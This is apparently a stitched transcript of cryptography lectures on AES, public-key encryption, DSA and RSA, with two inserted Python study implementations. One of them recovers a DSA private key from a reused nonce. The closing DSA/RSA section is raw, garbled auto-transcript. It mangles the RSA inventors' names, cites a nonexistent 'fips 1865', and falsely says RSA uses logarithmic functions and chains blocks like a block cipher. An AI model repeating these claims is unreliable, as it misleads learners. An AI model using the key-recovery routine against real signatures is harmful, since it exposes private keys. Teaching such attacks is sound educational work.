To get a better idea of what these keys and ciphertexts look like, we can use an online tool. As we already know, a key is mandatory to encrypt any kind of data. This key can be generated with mathematical functions or by a key generation program such as the one this website offers, and the tool lets you derive it from any piece of text; let's say the word is "simplilearn" in our example. (In real systems a key derived from a short word is only as strong as that word: keys should be generated randomly, and a password should only be turned into a key through a proper key derivation function.) Once the key is settled we provide the plaintext, or cleartext, to be encrypted with that key; suppose the sentence for this example is "this is my first message". We have now satisfied two prerequisites, the message and the key. Another variable that comes into play is the mode of operation. We have already learned about five modes, and the tool offers some other options as well; let us go with the CBC variant, which is the cipher block chaining method. One of CBC's key characteristics is its chaining process: each ciphertext block depends on all the plaintext blocks before it, and decrypting a block needs the ciphertext block immediately before it (or the IV for the first block). As a result, a single bit error in a ciphertext block garbles the decryption of that block completely and flips the same bit in the next plaintext block, while the blocks after that decrypt normally; reordering or dropping ciphertext blocks likewise corrupts the decryption of the affected blocks and their immediate successors. Regarding how to display the binary output we have two options: base64 or hexadecimal format. Let's go with base64 for now. As you can see, the ciphertext is readily available. Base64 is a little more compact than hex, so the displayed ciphertext is shorter, but the underlying bytes are identical in size: base64 uses four characters for every three bytes, while hex uses two characters for every byte, so base64 is the more efficient text encoding. To decrypt the ciphertext we go the same way: we copy the ciphertext into the decryption tool, make sure the key we are using is exactly the same, choose the same mode of operation, and choose the correct encoding, base64 in this case. As you can see, the decryption is complete and we get our plaintext back. If you keep everything the same but change only the encoding setting, the tool decodes the wrong bytes and will not be able to decrypt anything meaningful.

Unfortunately DES has become rather easy to crack even without knowing the key, because its 56-bit keyspace can be searched exhaustively with modern hardware. The Advanced Encryption Standard is still on top when it comes to symmetric encryption security and will likely stay there for a while. With so much growth in computing power, a stronger algorithm was necessary to safeguard personal data; as solid as DES was, the computers of today can break it with repeated attempts, rendering its protection useless. To counter this dilemma a new standard was introduced, termed the Advanced Encryption Standard, or the AES algorithm.

Let's learn what the Advanced Encryption Standard is. The AES algorithm, also known as the Rijndael algorithm, is a symmetric block cipher with a block size of 128 bits. Plaintext is converted into ciphertext using keys of 128, 192 or 256 bits. It is implemented in software and hardware throughout the world to encrypt sensitive data. The National Institute of Standards and Technology, NIST, started the AES effort in 1997 when it announced the need for an alternative to the Data Encryption Standard. A replacement for DES was needed because of its small key size: with increasing computing power it was considered unsafe against exhaustive key search attacks. Triple DES was designed to overcome this problem, but it was deemed too slow to be deployed in machines worldwide. Strong cases were presented by the MARS, RC6, Serpent and Twofish algorithms, but it was the Rijndael algorithm, now known as AES, that was eventually chosen as the standard symmetric key encryption algorithm. Its selection was formalized with the release of Federal Information Processing Standards Publication 197 in November 2001, approved by the U.S. Secretary of Commerce.

Now that we understand the origin of AES, let us have a look at the features that make the AES encryption algorithm unique. AES uses a substitution-permutation (SP) network. It consists of multiple rounds to produce a ciphertext, with a series of linked operations: some replace inputs with specific outputs (substitutions) and others shuffle bytes around (permutations). At the beginning of the encryption process we start with a single key, which can be 128, 192 or 256 bits long; this one key is expanded into the round keys used throughout the encryption and decryption cycle. Interestingly, AES performs all its calculations on bytes rather than on individual bits as DES does, so AES treats a 128-bit block of plaintext as 16 bytes. The number of rounds depends on the key size: a 128-bit key fixes 10 rounds, a 192-bit key 12 rounds, and a 256-bit key 14 rounds. A round key is required for each of these rounds, but since only one key is input into the algorithm, that single key has to be expanded to produce the key for each round, including round 0.

With so many mathematical calculations going on in the background there are bound to be a lot of steps in the procedure, so let's have a look at the steps followed in AES. Before we move ahead we need to understand how data is stored during AES encryption. Everything in the process is stored in a 4 by 4 matrix format. This matrix is known as the state array, and state arrays carry the data from one step to the next and from one round to the next: each round takes a state array as input and gives a state array as output. It is a 16-byte matrix, with each cell holding one byte and each column of four bytes forming a word, so every state array consists of four words; the bytes of a block are loaded into it column by column. As we previously discussed, we take a single key and expand it to the number of rounds we need. If the number of rounds is n, the key has to be expanded into n + 1 round keys, because the first round key is used in round 0; each round key is also four words long. Every round key is used for a single round, and the first one is applied before any round begins. In the very beginning the plaintext is captured into the state array and XORed with that first round key, K0, from the n + 1 expanded set. Moving on, the resulting state array is passed to the byte substitution step; after that the rows of the state array are shifted; then the columns of the state array are mixed by multiplying them with a constant matrix in the mix columns step; after which we add the round key for that particular round. These last four steps are part of every single round that the encryption algorithm goes through, and the state array is passed from one round to the next as input. In the last round, however, we skip the mix columns step, with the rest of the process unchanged.

But what are these byte substitution and row shifting processes? Let's find out about each step in more detail. In the first step the plaintext is stored in a state array and XORed with K0, the first key in the expanded key set. As a stand-alone step this is performed only once on a block, but the same add-round-key operation is repeated at the end of every round. The state array XORed with the key becomes a new state array, which is passed as input to the SubBytes process. In the second stage, byte substitution, we use a lookup table called the S-box (substitution box) to replace every byte of the state array. Each byte is written as two hexadecimal digits; the first digit selects the row and the second the column of the S-box, and the entry found there replaces the byte. Although the output looks random, the S-box is a fixed, carefully designed non-linear table given in the standard, and the same table is used everywhere. The entire state array passes through the S-box to produce a brand new state array, still a matrix with four rows and four columns, which is passed as input to the row shifting process. When it comes to row shifting, each byte in the four rows of the matrix is shifted to the left, and a byte that falls off the left end is reinserted at the right of that row. The change is done as follows: the first row is not moved at all, the second row is shifted one position to the left, the third row two positions, and the fourth row three positions. The result is a new matrix containing the same 16 bytes, but moved relative to each other to spread the influence of every byte across the block. In mix columns, each column of 4 bytes is replaced using a special mathematical function: it takes the 4 bytes of a column as input and outputs 4 completely new bytes, computed by multiplying the column with a fixed matrix using arithmetic in the finite field GF(2^8). We get a new matrix of the same size, 16 bytes, and it should be noted that this phase is not performed in the last round. When it comes to adding a round key, the 16 bytes of the matrix are treated as 128 bits and XORed with the 128 bits of the round key. If it is the last round, the output is the ciphertext; if there are still rounds remaining, the resulting 128 bits are interpreted as 16 bytes and we start another similar round.

Let's take an example to understand how all these processes work. If our plaintext is the string "Two One Nine Two" (sixteen ASCII characters, exactly one block), we first convert it into hexadecimal. We use the encryption key "Thats my Kung Fu" (also sixteen characters), converted into hexadecimal as well. As per the guidelines we use a single key, which is then expanded into n + 1 round keys, in this case 11 keys for 10 rounds. In round 0 we add the round key: the plaintext is XORed with K0 and we get a state array that is passed as input to the SubBytes process. In the SubBytes process we use the S-box to substitute every byte with a completely new byte, and the state array we receive is passed as input to the row shifting step. In row shifting each row is rotated to the left, the first row by zero places, the second by one, the third by two and the last by three. The state array from row shifting is passed as input to mix columns, where we multiply the state array with the constant matrix, after which we receive a new state array to pass on to the next step. We then XOR the new state array with the round key of this particular round, and whatever state array we receive becomes the output of this round. Since this is the first round of the entire encryption process, the state array we receive is passed as input to the next round. We repeat this process for the remaining rounds, ten in all with the last one skipping mix columns, and we finally receive the ciphertext. The final state array written in hexadecimal is our ciphertext, which can be used for transferring the information from the sender to the receiver.

Let's take a look at the applications of AES. AES finds most use in wireless security, in order to establish a secure channel between routers and clients; mechanisms like WPA2 and WPA2-PSK secure Wi-Fi endpoints with the help of the Rijndael algorithm. It also helps in SSL/TLS encryption, which is instrumental in encrypting our browser sessions: AES works in tandem with asymmetric algorithms to make sure the web browser and web server agree on keys and use encrypted channels for communication. AES is also prevalent in general file encryption of various formats, from critical documents to media files; the large key sizes let people encrypt and decrypt data with the maximum security available. AES is also implemented directly in hardware, for example as dedicated processor instructions and in hardware security appliances, which keeps the key material and the heavy computation out of ordinary software.

As a direct successor to the DES algorithm, there are some aspects in which AES provides an immediate advantage. Let us take a look. When it comes to key length, the biggest flaw in the DES algorithm was its small key, which is easily brute-forced by today's standards; AES offers 128-, 192- and 256-bit keys to bolster security. The block size is also larger in AES, 128 bits instead of 64, which adds to the complexity of the algorithm and avoids the block-collision problems that a 64-bit block runs into once a few gigabytes have been encrypted under one key. The number of rounds in DES is fixed at 16 irrespective of the key, whereas in AES the number of rounds depends on the key length, so a longer key also gets more rounds and a larger security margin. The DES algorithm is considered simpler than AES, yet AES beats DES in relative speed of encryption and decryption, which makes the Advanced Encryption Standard much more streamlined to deploy in frameworks and systems worldwide compared to the Data Encryption Standard.
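The ten-round AES-128 pipeline just described, as an added example that is not code from the original transcript or from any AES library: a from-scratch, standard-library-only Python implementation of the S-box, the key expansion and the SubBytes, ShiftRows, MixColumns and AddRoundKey steps, with the state stored column by column exactly as the 4 by 4 state array in the text. It traces the state array after every round for the "Two One Nine Two" / "Thats my Kung Fu" example used above and checks itself against the known-answer vector in FIPS 197 Appendix C. It is for study only: its table lookups leak timing, so it must never replace a vetted library.

```python
# Added example (not from the original transcript or any library): AES-128
# encryption assembled from the four round operations. Study code only; the
# table lookups are not constant-time, so never use it for real secrets.


def gmul(a: int, b: int) -> int:
    """Multiply two bytes in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    product = 0
    for _ in range(8):
        if b & 1:
            product ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return product


def _sbox_entry(x: int) -> int:
    """S-box entry: multiplicative inverse in GF(2^8), then the affine map."""
    inv = 0
    if x:
        inv, base, e = 1, x, 254          # x^254 == x^-1 in GF(2^8)
        while e:
            if e & 1:
                inv = gmul(inv, base)
            base = gmul(base, base)
            e >>= 1
    s = inv
    for k in range(1, 5):                 # XOR in the four left rotations
        s ^= ((inv << k) | (inv >> (8 - k))) & 0xFF
    return s ^ 0x63


SBOX = [_sbox_entry(x) for x in range(256)]
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key: bytes) -> list:
    """Expand a 16-byte key into the 11 round keys K0..K10 (16 bytes each)."""
    assert len(key) == 16
    w = [key[i:i + 4] for i in range(0, 16, 4)]          # four 32-bit words
    for i in range(4, 44):
        t = w[i - 1]
        if i % 4 == 0:                                    # RotWord, SubWord, Rcon
            t = bytes(SBOX[b] for b in t[1:] + t[:1])
            t = bytes([t[0] ^ RCON[i // 4 - 1]]) + t[1:]
        w.append(bytes(a ^ b for a, b in zip(w[i - 4], t)))
    return [b"".join(w[4 * r:4 * r + 4]) for r in range(11)]


# The state is the 4x4 matrix from the text stored column by column:
# index r + 4*c holds row r, column c, and each column is one word.
def sub_bytes(state: list) -> list:
    return [SBOX[b] for b in state]


def shift_rows(state: list) -> list:
    """Row r is rotated left by r positions (row 0 is left alone)."""
    return [state[r + 4 * ((c + r) % 4)] for c in range(4) for r in range(4)]


def mix_columns(state: list) -> list:
    """Multiply each column by the fixed matrix [2 3 1 1; 1 2 3 1; 1 1 2 3; 3 1 1 2]."""
    out = []
    for c in range(4):
        a0, a1, a2, a3 = state[4 * c:4 * c + 4]
        out += [gmul(a0, 2) ^ gmul(a1, 3) ^ a2 ^ a3,
                a0 ^ gmul(a1, 2) ^ gmul(a2, 3) ^ a3,
                a0 ^ a1 ^ gmul(a2, 2) ^ gmul(a3, 3),
                gmul(a0, 3) ^ a1 ^ a2 ^ gmul(a3, 2)]
    return out


def add_round_key(state: list, round_key: bytes) -> list:
    return [s ^ k for s, k in zip(state, round_key)]


def aes128_encrypt_block(key: bytes, block: bytes, trace: list = None) -> bytes:
    """Encrypt one 16-byte block; if `trace` is a list, the state after each round is appended."""
    assert len(block) == 16
    rk = expand_key(key)
    state = add_round_key(list(block), rk[0])                     # round 0: AddRoundKey only
    if trace is not None:
        trace.append(("round 0", bytes(state).hex()))
    for r in range(1, 10):                                        # rounds 1-9: all four steps
        state = add_round_key(mix_columns(shift_rows(sub_bytes(state))), rk[r])
        if trace is not None:
            trace.append((f"round {r}", bytes(state).hex()))
    state = add_round_key(shift_rows(sub_bytes(state)), rk[10])   # round 10: no MixColumns
    if trace is not None:
        trace.append(("round 10", bytes(state).hex()))
    return bytes(state)


if __name__ == "__main__":
    trace = []
    ct = aes128_encrypt_block(b"Thats my Kung Fu", b"Two One Nine Two", trace)
    for label, hexstate in trace:
        print(f"{label:>9}: {hexstate}")
    print("ciphertext:", ct.hex())
```

The first trace line for the text's example starts with 00 1f 0e 54, the XOR of "Two " with "That", and the round 1 key begins e2 32 fc f1, which is a quick way to check a key expansion by hand before trusting the rest.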
Hello. In our last video on cryptography we took a look at symmetric key cryptography, where we used a single private key for both the encryption and decryption of data, and it works very well in theory. Let's take a look at a more realistic scenario now. Let's meet Joe. Joe is a journalist who needs to communicate with Ryan via long-distance messaging. Due to the critical nature of the information, people are waiting for any message to leave Joe's house so that they can intercept it. Now Joe can easily use symmetric cryptography to send the encrypted data, so that even if someone intercepts the message they cannot understand what it says. But here's the tricky part: how will Joe send the required decryption key to Ryan? The sender of the message as well as the receiver need to have the same key so that they can exchange messages; otherwise Ryan cannot decrypt the information even when he receives the ciphertext. If someone intercepts the key while it is being transmitted, there is no use in employing cryptography, since a third party can now decode all the information easily. Key sharing is a risk that will always exist when symmetric key cryptography is being used. Thankfully, asymmetric key encryption has managed to fix this problem.

This is Baba from Simplilearn, and welcome to this video on asymmetric key cryptography. Let's take a look at what we are going to learn today. We begin by explaining what asymmetric cryptography is and how it works. We take a look at its applications and uses, we understand why it's called public key cryptography, then we learn a little bit about RSA encryption, and then we learn about the advantages of asymmetric key cryptography over symmetric key cryptography.

Let's understand what asymmetric key cryptography is. Asymmetric encryption uses two different keys: a private key and a public key. The public key is used to encrypt the information before transit and the private key is used to decrypt the data after transit. This pair of keys belongs to the receiver of the message. The public key can be shared via messaging, blog posts or key servers, with no restrictions. As you can see in the image, the two keys work together in the system. The sender first encrypts the message using the receiver's public key, which gives us the ciphertext. The ciphertext is then transmitted to the receiver without any other key. On getting the ciphertext, the receiver uses his private key to decrypt it and get the plaintext back. There has been no requirement for any secret key exchange throughout this process, which solves the most glaring flaw faced in symmetric cryptography. The public key, known to everyone, cannot be used to decrypt the message, and the private key, which can decrypt the message, need not be shared with anyone. The sender and receiver can exchange personal data using the same set of keys as often as they like. To understand this better, take the analogy of your mailbox. Anyone who wants to send you a letter has access to the slot and can easily share information with you; in a way you can say the mailbox is publicly available to all, but only you have the key that can open the mailbox and read the letters in it. This is where the private key comes into play. No one can intercept the message and read its contents, since it's encrypted; once the receiver gets it, he can use his private key to decrypt the information. The public key and the private key are generated together so that they are mathematically linked, and you cannot substitute another private key to decrypt the data. In another example, if Alice wants to send a message to Bob, let's say it reads "call me today", she must use Bob's public key while encrypting the message. Upon receiving the ciphertext, Bob can use his private key to decrypt the message, and hence confidentiality is attained during transmission without any need for sharing a secret key. The one thing the sender must still be sure of is that the public key really belongs to the intended receiver; if an attacker can substitute their own public key, they can read everything, which is why public keys are usually distributed with certificates that vouch for their owner.

Since this type of encryption is highly secure, it has many uses in areas that require high confidentiality. It is used to manage digital signatures, so there is valid proof of a document's authenticity. With so many aspects of business transitioning to the digital sphere, critical documents need to be verified before being considered authentic and acted upon. Thanks to asymmetric cryptography, senders can now sign documents with their private keys, and anyone who needs to verify the authenticity of such a signature can use the sender's public key to check it. Since the public and the private keys are linked to each other mathematically, it is impossible to pass this verification with a different key. Document encryption has been made very simple by today's standards, but the background implementation follows the same approach. In blockchain architecture, asymmetric cryptography is used to authorize transactions and maintain the system: thanks to its two-key structure, changes are reflected across the blockchain's peer-to-peer network only if they carry a valid signature from the key holder. Along with asymmetric key cryptography's tamper-evident architecture, its non-repudiation characteristic also helps in keeping the network stable. We can also use asymmetric key cryptography combined with symmetric cryptography to secure SSL or TLS encrypted browsing sessions, to make sure nobody can steal personal information when accessing banking websites or the internet in general. It plays a significant role in verifying a website's authenticity, exchanging the necessary encryption keys, and establishing a session using those keys to ensure maximum security, instead of the rather insecure plain HTTP format. Security parameters differ on a session-by-session basis, so the verification process is consistent and utterly essential to modern data security.

Another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography. With the most significant difficulty in symmetric encryption being key exchange, asymmetric keys can help clear up that shortcoming. The original message is first encrypted using a symmetric key. The symmetric key itself is then encrypted using the receiver's public key. Now we have two ciphertexts to transmit to the receiver. On receiving both, the receiver uses his private key to decrypt the symmetric key, and then uses that key to decrypt the original information. While this may seem more complicated than using asymmetric cryptography alone, symmetric encryption algorithms are much more optimized for vast amounts of data, and an asymmetric algorithm can only encrypt a small payload per operation, so encrypting the bulk data symmetrically and only the key asymmetrically is both faster and more secure in practice.

You might remember us discussing why symmetric encryption was called private key cryptography. Let us understand why asymmetric encryption falls under public key cryptography. We have two keys at our disposal: the encryption key is available to everyone, and the decryption key is supposed to be private. Unlike symmetric key cryptography, there is no need to share anything privately to have an encrypted messaging system. To put that into perspective, we share our email address with anyone looking to communicate with us; it is supposed to be public by design, while our email login credentials are private and prevent any data mishandling. Since the encryption key is hidden from no one, this category is called public key cryptography.

There are quite a few algorithms in use today that follow the architecture of asymmetric key cryptography, none more famous than RSA encryption. RSA is the most widely used public key encryption standard. Named after its inventors Rivest, Shamir and Adleman, it encrypts a fixed-size numeric block at a time: the data is encoded as an integer smaller than the modulus and transformed by modular exponentiation. If you are unfamiliar with how block ciphers work, they are encryption algorithms that divide the original data into blocks of equal size; the block size depends on the exact cipher being used, and once the data is broken down, the blocks are encrypted individually and later chained together to form the final ciphertext. RSA is widely considered a very secure form of encryption, albeit relatively slower than symmetric encryption algorithms, and it is widely used in web browsing, secure identification, VPNs, email and chat applications.

With so many variables in play, there must be some advantages that give asymmetric cryptography an edge over the traditional symmetric encryption methodologies. Let's go through some of them. There is no need for any reliable key-sharing channel in asymmetric encryption; that added risk in private key cryptography has been completely eliminated in the public key architecture. The key that is made public cannot decrypt any confidential information, and the only key that can decrypt doesn't need to be shared publicly under any circumstance. We have much more extensive key lengths in RSA encryption and other asymmetric algorithms, like 2048-bit and 4096-bit keys; larger keys are much harder to break by brute force and are much more secure. These key sizes are not directly comparable with symmetric ones, though: a 2048-bit RSA key offers roughly the strength of a 112-bit symmetric key, because RSA is attacked by factoring the modulus rather than by trying every key. Asymmetric key cryptography can also serve as proof of authenticity, since only the rightful owner of the private key can generate a signature that the matching public key verifies. Here the situation is reversed: the signing operation is done with the private key and the verification with the public key, and verification fails if the correct private key was not used, hence proving the authenticity of the owner. It also has tamper protection: the message cannot be intercepted and changed without invalidating the signature. Consequently, the public key fails to verify a modified message, and it is easy to realize that the information is not legitimate.

Now that we have had a proper revision, let's understand what digital signatures are before moving on to the algorithm. The objective of digital signatures is to authenticate and verify documents and data. This is necessary to avoid tampering, digital modification or forgery of any kind during the transmission of official documents. They work on the public key cryptography architecture with one exception: typically an asymmetric key system encrypts using a public key and decrypts with a private key; for digital signatures, however, the reverse is true. The signature is generated with the private key and checked with the public key. Because the keys are linked together, checking it with the public key verifies that the proper private key was used to sign the document, thereby verifying the signature's provenance. Let's go through each step to understand the procedure thoroughly. In step 1 we have M, the original plaintext message, which is passed through a hash function, denoted by hash, to create a digest. Next, the sender signs the digest with the sender's private key and bundles the message together with that signed digest. The bundle is sent to the receiver, who can check the signed digest using the sender's public key. Once that is done, the received message is passed through the same hash function to generate a fresh digest, and the receiver compares the newly generated hash with the hash recovered from the signature. If they match, it verifies data integrity and origin. In many instances they provide a layer of validation and security to messages sent through a non-secure channel. Properly implemented, a digital signature gives the receiver reason to believe that the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects, but properly implemented digital signatures are more difficult to forge than the handwritten type. Digital signature schemes in the sense used here are cryptographically based and must be implemented properly to be effective. They can also provide non-repudiation, meaning that the signer cannot successfully claim that they did not sign a message while also claiming their private key remains secret. Further, some non-repudiation schemes add a timestamp to the digital signature, so that even if the private key is later exposed, signatures made before that time remain valid.

To implement the concept of digital signatures in the real world we have two primary algorithms to follow, the RSA algorithm and the DSA algorithm, and the latter is our topic for today. So let's go ahead and see what the Dig­ital Signature Algorithm is supposed to do. The Digital Signature Algorithm is a FIPS standard, a Federal Information Processing Standard, for digital signatures. It was proposed in 1991 and standardized in 1994 by the National Institute of Standards and Technology, NIST. It functions on the framework of modular exponentiation and the discrete logarithm problem, which is hard to solve by brute force. Unlike DSA, most signature types are generated by applying the private key of the originator to the message digest, which creates a digital thumbprint of the data. Since just the message digest is signed, the signature is generally much smaller than the data that was signed; as a result, digital signatures impose little slowdown on processors at signing time and use small amounts of bandwidth. DSA, on the other hand, does not encrypt the message digest with the private key or decrypt it with the public key. Instead it uses mathematical functions to create a digital signature consisting of two numbers, each 160 bits long for the original parameter size, which are derived from the message digest and the private key. DSA makes use of the public key for authenticating the signature, but the verification process is more involved than in RSA. DSA also provides three benefits: message authentication, integrity verification and non-repudiation. In the image we can see the entire process of DSA validation. A plaintext message is passed to a hash function, where the digest is generated; this is passed to a signing function, which also takes other parameters: the global variable g, a random per-signature value k, and the private key of the sender. The outputs are then bundled into a single package with the plaintext and sent to the receiver. The two outputs we receive from the signing function are the two 160-bit numbers denoted by s and r. On the receiver's end we pass the plaintext to the same hash function to regenerate the message digest. It is passed to a verification function that has other requirements, such as the public key of the sender, the global variable g, and the s and r received from the sender. The value generated by the function is then compared to r; if they match, the verification process is complete and data integrity is verified. This was an overview of the way the DSA algorithm works. You already know it depends on modular exponentiation and discrete logarithms to calculate the outputs, so let us see how we can do the same in our next section. We have three phases here, the first of which is key generation. To generate the keys we need some prerequisites. We select a prime q, which becomes the prime divisor. We select a prime number p such that (p - 1) mod q = 0.
We also select an integer g that satisfies the two conditions shown on screen; in the standard, g is computed as h^((p - 1)/q) mod p for some h with 1 < h < p - 1 and must come out greater than 1, so that g has order q modulo p. Once these values are selected we can go ahead with generating the keys. The private key, denoted by x, is any random integer strictly between 0 and q. The public key is calculated as y = g^x mod p, where y stands for the public key. The private key can then be packaged as a bundle comprising the values p, q, g and x; similarly, the public key can be packaged as a bundle having the values p, q, g and y. Once we are done with key generation we can start generating the signature. The message is passed through a hash function to generate the digest h. Next we choose a random integer k strictly between 0 and q, fresh for every signature. To calculate the first 160-bit number of the signature, r, we use the formula r = (g^k mod p) mod q. Similarly, to calculate the second output, s, we use the formula shown on screen, s = k^(-1) (h + x r) mod q. The signature can then be packaged as the pair (r, s). This bundle, along with the plaintext message, is then passed on to the receiver. Now for the third phase, we have to verify the signature. We first calculate the digest of the message received in the bundle by passing it through the same hash function. We calculate the values w, u1 and u2 using the formulas shown on screen: w = s^(-1) mod q, u1 = h w mod q and u2 = r w mod q. We then have to calculate a verification component, v = ((g^u1 y^u2) mod p) mod q, which is compared with the value of r sent by the sender. If the values match, the signature verification is successful, and the entire process is complete, starting from key generation to the signature generation all the way up to the verification of the signature.
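The three DSA phases just described (parameter and key generation, signing, verification), as an added example that is not from the original transcript or any library, in pure standard-library Python using the text's symbols p, q, g, x, y, k, r, s, w, u1, u2 and v; it also serves as the concrete form of the generic hash-then-sign-then-verify flow described earlier for digital signatures. It goes one step beyond the text with a function that recovers the private key from two signatures made with the same k, which is why k must be fresh and unpredictable for every signature. The parameter sizes (512-bit p, 160-bit q), the fixed seed and the sample messages are chosen so the demo runs quickly and reproducibly; they are far too small for real use.

```python
# Added example (not from the original transcript or any library): textbook
# DSA with the text's symbols, plus the classic failure mode of a reused k.
# Parameter sizes are toy-sized for speed and the seed is fixed for
# reproducibility; real deployments use a vetted library and larger parameters.
import hashlib
import random


def is_probable_prime(n: int, rounds: int = 32, rng=random) -> bool:
    """Miller-Rabin test with `rounds` random bases."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_parameters(L: int = 512, N: int = 160, seed: int = 2023):
    """Domain parameters (p, q, g): q is an N-bit prime, p an L-bit prime with
    q | p - 1, and g = h^((p-1)/q) mod p with g > 1, so g has order q."""
    rng = random.Random(seed)
    while True:
        q = rng.getrandbits(N) | (1 << (N - 1)) | 1
        if is_probable_prime(q, rng=rng):
            break
    while True:
        k = rng.randrange((1 << (L - 1)) // q + 1, (1 << L) // q)
        p = k * q + 1                         # guarantees (p - 1) mod q == 0
        if is_probable_prime(p, rng=rng):
            break
    while True:
        g = pow(rng.randrange(2, p - 1), (p - 1) // q, p)
        if g > 1:
            return p, q, g


def generate_keypair(params, rng=random):
    p, q, g = params
    x = rng.randrange(1, q)                   # private key: 0 < x < q
    return x, pow(g, x, p)                    # public key y = g^x mod p


def hash_to_int(message: bytes, q: int) -> int:
    """SHA-256 digest as an integer, truncated to the bit length of q."""
    z = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return z >> max(0, 256 - q.bit_length())


def sign(params, x: int, message: bytes, rng=random, k: int = None):
    """Return (r, s). `k` may be supplied only to demonstrate the reuse attack."""
    p, q, g = params
    h = hash_to_int(message, q)
    while True:
        kk = rng.randrange(1, q) if k is None else k   # fresh random k each time
        r = pow(g, kk, p) % q
        s = (pow(kk, -1, q) * (h + x * r)) % q
        if r != 0 and s != 0:
            return r, s
        k = None                              # astronomically rare: retry with a new k


def verify(params, y: int, message: bytes, signature) -> bool:
    p, q, g = params
    r, s = signature
    if not (0 < r < q and 0 < s < q):
        return False
    w = pow(s, -1, q)
    u1 = (hash_to_int(message, q) * w) % q
    u2 = (r * w) % q
    v = (pow(g, u1, p) * pow(y, u2, p) % p) % q
    return v == r


def recover_private_key(params, m1: bytes, sig1, m2: bytes, sig2) -> int:
    """Two signatures sharing r (hence the same k) leak x:
    k = (h1 - h2) / (s1 - s2) mod q, then x = (s1 * k - h1) / r mod q."""
    _, q, _ = params
    (r1, s1), (r2, s2) = sig1, sig2
    if r1 != r2:
        raise ValueError("r differs, so k was not reused")
    h1, h2 = hash_to_int(m1, q), hash_to_int(m2, q)
    k = ((h1 - h2) * pow((s1 - s2) % q, -1, q)) % q
    return ((s1 * k - h1) * pow(r1, -1, q)) % q


if __name__ == "__main__":
    params = generate_parameters()
    x, y = generate_keypair(params)
    sig = sign(params, x, b"call me today")              # constructed sample message
    print("valid signature verifies:", verify(params, y, b"call me today", sig))
    print("tampered message verifies:", verify(params, y, b"call me tomorrow", sig))
    s1 = sign(params, x, b"first", k=12345)               # deliberate k reuse
    s2 = sign(params, x, b"second", k=12345)
    print("private key recovered from k reuse:",
          recover_private_key(params, b"first", s1, b"second", s2) == x)
```

Note that the verifier never sees k and does not need it: it recomputes r from the public values alone, which is the whole trick behind v == r. The recovery function is the reason real implementations derive k from the private key and the message (deterministically, as RFC 6979 does) rather than trusting a random number generator.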
steps to follow we are bound to have a few advantages to boot this and we would be right to think so DSA is highly robust in the security and stability aspect when compared to Alternative signature verification algorithms we have a few other ciphers that aim to achieve the Simplicity and the flexibility of DSA but it has been a tough ask for all the other suits the key generation is much faster when compared to the RSA algorithm and such while the actual encryption and decryption process May falter a little in comparison a quicker start in the beginning is well known to optimize a lot of Frameworks DSA requires Less storage space to work its entire cycle in contrast its direct correspondent that is RSA algorithm needs a certain amount of computational and storage space to function efficiently this is not the case with DSL which has been optimized to work with weaker hardware and lesser resources the DSA is patented but nist has made this pattern available worldwide royalty free a draft version of the speculation fips 1865 indicates that DSA will no longer be approved for digital signature generation but it may be used to verify signatures generated prior to the implementation date of that standard the RSA algorithm is a public key signature algorithm developed by a Ron revised ADI Shamir and Leonard Edelman the paper was first published in 1977 and the algorithm uses logarithmic functions to keep the working complex enough to withstand brute force and streamlined enough to be fast post deployment RSA can also encrypt and decrypt general information to securely exchange data along with handling digital signature verification let us understand how it achieve this we take our plain text message M we pass it through a hash function to generate the digest H which is then encrypted using the sender's private key this is appended to the original plain text message and sent over to the receiver once the receiver receives the bundle we can pass the plain text message to the 
same hash function to generate a digest and the ciphertext can be decrypted using the public key of the sender the remaining hashes are compared if the values match then the data Integrity is verified and the sender is authenticated apart from digital signatures the main case of RSA is encryption and decryption of private information before being transmitted across communication challenge this is where the data encryption comes into play when using RSA for encryption and decryption of General data it reverses the key set usage unlike signature verification it receives the receiver's public key to encrypt the data and uses the receiver's private key in decrypting the data thus there is no need to exchange any keys in this scenario there are two broad components when it comes to RSA cryptography one of them is key generation key generation employs a step of generating the private and the public keys that are going to be used for encrypting and decrypting the data the second part is the encryption and decryption functions these are the ciphers and steps that need to be run when scrambling the data or recovering the data from the ciphertext you will Now understand each of these steps in a next subtopic keeping the previous two concepts in mind let us go ahead and see how the entire process works starting from creating the keeper to encrypting and decrypting the information you need to generate the public and private Keys before running the functions to generate ciphertext and plain text to use certain variables and parameters all of which are explained we first used two large prime numbers which can be denoted by P and Q we can compute the value of n as n equal to P into q and compute the value of Z as P minus 1 into Q minus 1. 
A number e is chosen at random satisfying the conditions shown, and a number d is also selected following the formula e × d mod Z = 1; it can be calculated with the formula given below. The public key is then packaged as a bundle with n and e, and the private key is packaged as a bundle with n and d. This sums up the key generation process. For the encryption and decryption functions, we use the formulas for C and M: the ciphertext can be calculated as C = M^e mod n, and the plain text can be recovered from the ciphertext as M = C^d mod n. When it comes to a data encryption example, let's take P and Q as 7 and 13. The value of n can be calculated as 91. If we select the value of e to be 5, it satisfies all the criteria that we needed. The value of d can be calculated using the function mentioned, which gives it as 29. The public key can then be packaged as (91, 5) and the private key as (91, 29). If the plain text, denoted by M, is 10, the ciphertext can be calculated with the formula C = M^e mod n, which gives us 82.
